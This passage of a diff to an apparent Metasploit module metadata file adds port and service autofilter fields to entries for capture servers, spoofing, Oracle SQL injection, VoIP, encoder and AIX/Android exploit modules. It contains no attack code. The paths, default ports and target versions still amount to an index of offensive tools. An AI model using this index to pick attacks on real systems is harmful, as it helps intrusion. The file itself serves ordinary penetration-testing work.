06:26:21 +0000", "path": "/modules/auxiliary/server/capture/sip.rb", @@ -29625,6 +39884,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/smb.rb", @@ -29655,6 +39920,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/smtp.rb", @@ -29684,6 +39955,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:02:33 +0000", "path": "/modules/auxiliary/server/capture/telnet.rb", @@ -29713,6 +39990,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/vnc.rb", @@ -29751,6 +40034,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-17 22:29:20 +0000", "path": "/modules/auxiliary/server/dhclient_bash_env.rb", @@ -29784,6 +40073,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/dhcp.rb", @@ -29813,6 +40108,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + 53 + ], + "autofilter_services": [ + "dns" + ], "targets": null, "mod_time": "2018-01-22 23:37:39 +0000", "path": "/modules/auxiliary/server/dns/native_server.rb", @@ -29843,6 +40144,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/dns/spoofhelper.rb", @@ -29874,6 +40181,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/fakedns.rb", @@ -29903,6 +40216,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/ftp.rb", @@ -29932,6 +40251,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-18 11:33:48 +0000", "path": "/modules/auxiliary/server/http_ntlmrelay.rb", @@ -29963,6 +40297,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/server/icmp_exfil.rb", @@ -29997,6 +40337,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb", @@ -30026,6 +40372,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-14 09:28:38 +0000", "path": "/modules/auxiliary/server/local_hwbridge.rb", @@ -30059,6 +40411,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/ms15_134_mcl_leak.rb", @@ -30094,6 +40452,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/netbios_spoof_nat.rb", @@ -30127,6 +40491,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb", @@ -30163,6 +40533,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/server/openssl_heartbeat_client_memory.rb", @@ -30195,6 +40571,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/pxeexploit.rb", @@ -30226,6 +40608,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/regsvr32_command_delivery_server.rb", @@ -30255,6 +40643,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/socks4a.rb", @@ -30286,6 +40680,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-05-26 13:46:00 +0000", "path": "/modules/auxiliary/server/socks5.rb", @@ -30315,6 +40715,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/socks_unc.rb", @@ -30345,6 +40751,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/tftp.rb", @@ -30374,6 +40786,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/server/webkit_xslt_dropper.rb", @@ -30405,6 +40823,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/wget_symlink_file_write.rb", @@ -30434,6 +40858,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/wpad.rb", @@ -30463,6 +40893,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-04 15:27:20 +0000", "path": "/modules/auxiliary/sniffer/psnuffle.rb", @@ -30494,6 +40930,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/spoof/arp/arp_poisoning.rb", @@ -30523,6 +40965,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/cisco/cdp.rb", @@ -30552,6 +41000,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/cisco/dtp.rb", @@ -30586,6 +41040,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/dns/bailiwicked_domain.rb", @@ -30619,6 +41079,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/dns/bailiwicked_host.rb", @@ -30648,6 +41114,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/spoof/dns/compare_results.rb", @@ -30677,6 +41149,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + 53 + ], + "autofilter_services": [ + "dns" + ], "targets": null, "mod_time": "2018-01-31 23:44:51 +0000", "path": "/modules/auxiliary/spoof/dns/native_spoofer.rb", @@ -30706,6 +41184,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/llmnr/llmnr_response.rb", @@ -30737,6 +41221,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/mdns/mdns_response.rb", @@ -30766,6 +41256,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/nbns/nbns_response.rb", @@ -30795,6 +41291,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/replay/pcap_replay.rb", @@ -30825,6 +41327,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb", @@ -30855,6 +41363,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb", @@ -30886,6 +41400,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb", @@ -30917,6 +41437,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb", @@ -30951,6 +41477,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb", @@ -30983,6 +41515,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_export_extension.rb", @@ -31012,6 +41550,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb", @@ -31041,6 +41585,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb", @@ -31070,6 +41620,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb", @@ -31102,6 +41658,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/droptable_trigger.rb", @@ -31134,6 +41696,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb", @@ -31166,6 +41734,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb", @@ -31197,6 +41771,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb", @@ -31229,6 +41809,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb", @@ -31261,6 +41847,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb", @@ -31291,6 +41883,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb", @@ -31322,6 +41920,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb", @@ -31351,6 +41955,12 @@ "platform": "", "arch": "", "rport": 5038, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/asterisk_login.rb", @@ -31381,6 +41991,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/cisco_cucdm_call_forward.rb", @@ -31411,6 +42036,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb", @@ -31440,6 +42080,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/voip/sip_deregister.rb", @@ -31470,6 +42116,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/sip_invite_spoof.rb", @@ -31500,6 +42152,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/telisca_ips_lock_control.rb", @@ -31529,6 +42196,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb", @@ -31558,6 +42231,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/malware/dns/dns_query.rb", @@ -31587,6 +42266,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb", @@ -31616,6 +42301,18 @@ "platform": "", "arch": "", "rport": "25", + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/pii/email_pii.rb", @@ -31645,6 +42342,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/pii/web_pii.rb", @@ -31675,6 +42378,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-23 15:20:56 +0000", "path": "/modules/encoders/cmd/brace.rb", @@ -31704,6 +42409,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/echo.rb", @@ -31733,6 +42440,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/generic_sh.rb", @@ -31763,6 +42472,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-23 15:20:38 +0000", "path": "/modules/encoders/cmd/ifs.rb", @@ -31792,6 +42503,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/perl.rb", @@ -31821,6 +42534,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/powershell_base64.rb", @@ -31850,6 +42565,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/encoders/cmd/printf_php_mq.rb", @@ -31879,6 +42596,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/generic/eicar.rb", @@ -31908,6 +42627,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/generic/none.rb", @@ -31938,6 +42659,8 @@ "platform": "All", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsbe/byte_xori.rb", @@ -31967,6 +42690,8 @@ "platform": "All", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsbe/longxor.rb", @@ -31997,6 +42722,8 @@ "platform": "All", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsle/byte_xori.rb", @@ -32026,6 +42753,8 @@ "platform": "All", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsle/longxor.rb", @@ -32055,6 +42784,8 @@ "platform": "All", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-12 17:59:12 +0000", "path": "/modules/encoders/php/base64.rb", @@ -32085,6 +42816,8 @@ "platform": "All", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/ppc/longxor.rb", @@ -32115,6 +42848,8 @@ "platform": "All", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/ppc/longxor_tag.rb", @@ -32144,6 +42879,8 @@ "platform": "All", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-24 18:33:27 +0000", "path": "/modules/encoders/ruby/base64.rb", @@ -32174,6 +42911,8 @@ "platform": "All", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/sparc/longxor_tag.rb", @@ -32203,6 +42942,8 @@ "platform": "All", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x64/xor.rb", @@ -32232,6 +42973,8 @@ "platform": "All", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x64/zutto_dekiru.rb", @@ -32261,6 +43004,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/add_sub.rb", @@ -32291,6 +43036,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/alpha_mixed.rb", @@ -32321,6 +43068,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/alpha_upper.rb", @@ -32351,6 +43100,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/avoid_underscore_tolower.rb", @@ -32380,6 +43131,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/avoid_utf8_tolower.rb", @@ -32409,6 +43162,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/bloxor.rb", @@ -32438,6 +43193,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/bmp_polyglot.rb", @@ -32468,6 +43225,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/call4_dword_xor.rb", @@ -32497,6 +43256,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/context_cpuid.rb", @@ -32526,6 +43287,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/context_stat.rb", @@ -32555,6 +43318,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/context_time.rb", @@ -32584,6 +43349,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/countdown.rb", @@ -32613,6 +43380,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/fnstenv_mov.rb", @@ -32642,6 +43411,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/jmp_call_additive.rb", @@ -32671,6 +43442,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/nonalpha.rb", @@ -32700,6 +43473,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/nonupper.rb", @@ -32729,6 +43504,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/opt_sub.rb", @@ -32758,6 +43535,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/service.rb", @@ -32787,6 +43566,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/shikata_ga_nai.rb", @@ -32816,6 +43597,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/single_static_bit.rb", @@ -32846,6 +43629,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/unicode_mixed.rb", @@ -32876,6 +43661,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/unicode_upper.rb", @@ -32911,6 +43698,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM AIX Version 6.1", "IBM AIX Version 7.1" @@ -32948,6 +43741,12 @@ "platform": "AIX", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM AIX Version 5.1" ], @@ -32981,6 +43780,12 @@ "platform": "AIX", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM AIX Version 6.1.4", "IBM AIX Version 6.1.3", @@ -33023,6 +43828,12 @@ "platform": "Linux", "arch": "armle, x86, x64, mipsle", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "armle", "x86", @@ -33060,6 +43871,12 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33099,6 +43916,12 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)", @@ -33171,6 +43994,12 @@ "platform": "Android,Linux", "arch": "dalvik, x86, armle, mipsle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33205,6 +44034,12 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Android ARM", "Android MIPSLE", @@ -33242,6 +44077,12 @@ "platform": "Android,Linux", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "Default", @@ -33282,6 